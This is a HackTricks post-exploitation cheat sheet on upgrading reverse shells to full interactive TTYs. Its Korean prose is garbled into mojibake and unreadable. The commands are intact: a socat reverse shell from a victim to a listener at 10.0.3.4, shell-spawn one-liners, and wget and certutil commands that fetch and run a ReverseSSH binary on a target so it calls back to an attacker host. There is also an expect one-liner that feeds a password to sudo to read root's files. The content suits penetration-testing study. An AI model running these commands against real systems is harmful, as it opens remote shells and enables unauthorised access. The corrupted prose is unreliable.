Full TTYs
Tip
AWS ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:
HackTricks Training AWS Red Team Expert (ARTE)
GCP ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:HackTricks Training GCP Red Team Expert (GRTE)
Azure ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:
HackTricks Training Azure Red Team Expert (AzRTE)
HackTricks ์ง์ํ๊ธฐ
- ๊ตฌ๋ ๊ณํ ํ์ธํ๊ธฐ!
- **๐ฌ ๋์ค์ฝ๋ ๊ทธ๋ฃน ๋๋ ํ ๋ ๊ทธ๋จ ๊ทธ๋ฃน์ ์ฐธ์ฌํ๊ฑฐ๋ ํธ์ํฐ ๐ฆ @hacktricks_live๋ฅผ ํ๋ก์ฐํ์ธ์.
- HackTricks ๋ฐ HackTricks Cloud ๊นํ๋ธ ๋ฆฌํฌ์งํ ๋ฆฌ์ PR์ ์ ์ถํ์ฌ ํดํน ํธ๋ฆญ์ ๊ณต์ ํ์ธ์.
Full TTY
SHELL ๋ณ์์ ์ค์ ํ ์
ธ์ ๋ฐ๋์ _/etc/shells_์ ๋ชฉ๋ก์ ์์ด์ผ ํ๋ฉฐ, ๊ทธ๋ ์ง ์์ผ๋ฉด The value for the SHELL variable was not found in the /etc/shells file This incident has been reported๋ผ๋ ๋ฉ์์ง๊ฐ ํ์๋ฉ๋๋ค. ๋ํ, ๋ค์ ์ค๋ํซ์ bash์์๋ง ์๋ํฉ๋๋ค. zsh์ ์๋ ๊ฒฝ์ฐ, bash๋ฅผ ์คํํ์ฌ bash๋ก ๋ณ๊ฒฝํ ํ ์
ธ์ ์ป์ผ์ญ์์ค.
Python
python3 -c 'import pty; pty.spawn("/bin/bash")'
(inside the nc session) CTRL+Z;stty raw -echo; fg; ls; export SHELL=/bin/bash; export TERM=screen; stty rows 38 columns 116; reset;
Note
**
stty -a**๋ฅผ ์คํํ์ฌ ํ๊ณผ ์ด์ ์๋ฅผ ํ์ธํ ์ ์์ต๋๋ค.
script
script /dev/null -qc /bin/bash #/dev/null is to not store anything
(inside the nc session) CTRL+Z;stty raw -echo; fg; ls; export SHELL=/bin/bash; export TERM=screen; stty rows 38 columns 116; reset;
socat
#Listener:
socat file:`tty`,raw,echo=0 tcp-listen:4444
#Victim:
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444
์ ์์ฑ
python -c 'import pty; pty.spawn("/bin/sh")'echo os.system('/bin/bash')/bin/sh -iscript -qc /bin/bash /dev/nullperl -e 'exec "/bin/sh";'- perl:
exec "/bin/sh"; - ruby:
exec "/bin/sh" - lua:
os.execute('/bin/sh') - IRB:
exec "/bin/sh" - vi:
:!bash - vi:
:set shell=/bin/bash:shell - nmap:
!sh
ReverseSSH
๋ํํ ์ ์ ๊ทผ ๋ฐ ํ์ผ ์ ์ก๊ณผ ํฌํธ ํฌ์๋ฉ์ ์ํ ํธ๋ฆฌํ ๋ฐฉ๋ฒ์ ์ ์ ์ผ๋ก ์ฐ๊ฒฐ๋ ssh ์๋ฒ ReverseSSH๋ฅผ ํ๊ฒ์ ๋ฐฐํฌํ๋ ๊ฒ์ ๋๋ค.
์๋๋ upx๋ก ์์ถ๋ ๋ฐ์ด๋๋ฆฌ๋ฅผ ์ฌ์ฉํ๋ x86์ ์์
๋๋ค. ๋ค๋ฅธ ๋ฐ์ด๋๋ฆฌ์ ๋ํด์๋ ๋ฆด๋ฆฌ์ค ํ์ด์ง๋ฅผ ํ์ธํ์ธ์.
- ssh ํฌํธ ํฌ์๋ฉ ์์ฒญ์ ์์ ํ๊ธฐ ์ํด ๋ก์ปฌ์์ ์ค๋นํฉ๋๋ค:
# Drop it via your preferred way, e.g.
wget -q https://github.com/Fahrj/reverse-ssh/releases/latest/download/upx_reverse-sshx86 -O /dev/shm/reverse-ssh && chmod +x /dev/shm/reverse-ssh
/dev/shm/reverse-ssh -v -l -p 4444
- (2a) ๋ฆฌ๋ ์ค ํ๊ฒ:
# Drop it via your preferred way, e.g.
wget -q https://github.com/Fahrj/reverse-ssh/releases/latest/download/upx_reverse-sshx86 -O /dev/shm/reverse-ssh && chmod +x /dev/shm/reverse-ssh
/dev/shm/reverse-ssh -p 4444 kali@10.0.0.2
- (2b) Windows 10 ํ๊ฒ (์ด์ ๋ฒ์ ์ ํ๋ก์ ํธ README๋ฅผ ํ์ธํ์ธ์):
# Drop it via your preferred way, e.g.
certutil.exe -f -urlcache https://github.com/Fahrj/reverse-ssh/releases/latest/download/upx_reverse-sshx86.exe reverse-ssh.exe
reverse-ssh.exe -p 4444 kali@10.0.0.2
- ReverseSSH ํฌํธ ํฌ์๋ฉ ์์ฒญ์ด ์ฑ๊ณตํ๋ค๋ฉด, ์ด์
reverse-ssh(.exe)๋ฅผ ์คํํ๋ ์ฌ์ฉ์์ ์ปจํ ์คํธ์์ ๊ธฐ๋ณธ ๋น๋ฐ๋ฒํธletmeinbrudipls๋ก ๋ก๊ทธ์ธํ ์ ์์ด์ผ ํฉ๋๋ค:
# Interactive shell access
ssh -p 8888 127.0.0.1
# Bidirectional file transfer
sftp -P 8888 127.0.0.1
Penelope
Penelope๋ ๋ฆฌ๋ ์ค ๋ฆฌ๋ฒ์ค ์ ธ์ ์๋์ผ๋ก TTY๋ก ์ ๊ทธ๋ ์ด๋ํ๊ณ , ํฐ๋ฏธ๋ ํฌ๊ธฐ๋ฅผ ์ฒ๋ฆฌํ๋ฉฐ, ๋ชจ๋ ๊ฒ์ ๊ธฐ๋กํ๊ณ ๊ทธ ์ธ์๋ ๋ง์ ๊ธฐ๋ฅ์ ์ ๊ณตํฉ๋๋ค. ๋ํ Windows ์ ธ์ ๋ํ readline ์ง์์ ์ ๊ณตํฉ๋๋ค.
No TTY
์ด๋ค ์ด์ ๋ก ์ ์ฒด TTY๋ฅผ ์ป์ ์ ์๋ ๊ฒฝ์ฐ์๋ ์ฌ์ ํ ์ฌ์ฉ์ ์
๋ ฅ์ ๊ธฐ๋ํ๋ ํ๋ก๊ทธ๋จ๊ณผ ์ํธ์์ฉํ ์ ์์ต๋๋ค. ๋ค์ ์์ ์์๋ ๋น๋ฐ๋ฒํธ๊ฐ sudo์ ์ ๋ฌ๋์ด ํ์ผ์ ์ฝ์ต๋๋ค:
expect -c 'spawn sudo -S cat "/root/root.txt";expect "*password*";send "<THE_PASSWORD_OF_THE_USER>";send "\r\n";interact'
Tip
AWS ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:
HackTricks Training AWS Red Team Expert (ARTE)
GCP ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:HackTricks Training GCP Red Team Expert (GRTE)
Azure ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:
HackTricks Training Azure Red Team Expert (AzRTE)
HackTricks ์ง์ํ๊ธฐ
- ๊ตฌ๋ ๊ณํ ํ์ธํ๊ธฐ!
- **๐ฌ ๋์ค์ฝ๋ ๊ทธ๋ฃน ๋๋ ํ ๋ ๊ทธ๋จ ๊ทธ๋ฃน์ ์ฐธ์ฌํ๊ฑฐ๋ ํธ์ํฐ ๐ฆ @hacktricks_live๋ฅผ ํ๋ก์ฐํ์ธ์.
- HackTricks ๋ฐ HackTricks Cloud ๊นํ๋ธ ๋ฆฌํฌ์งํ ๋ฆฌ์ PR์ ์ ์ถํ์ฌ ํดํน ํธ๋ฆญ์ ๊ณต์ ํ์ธ์.


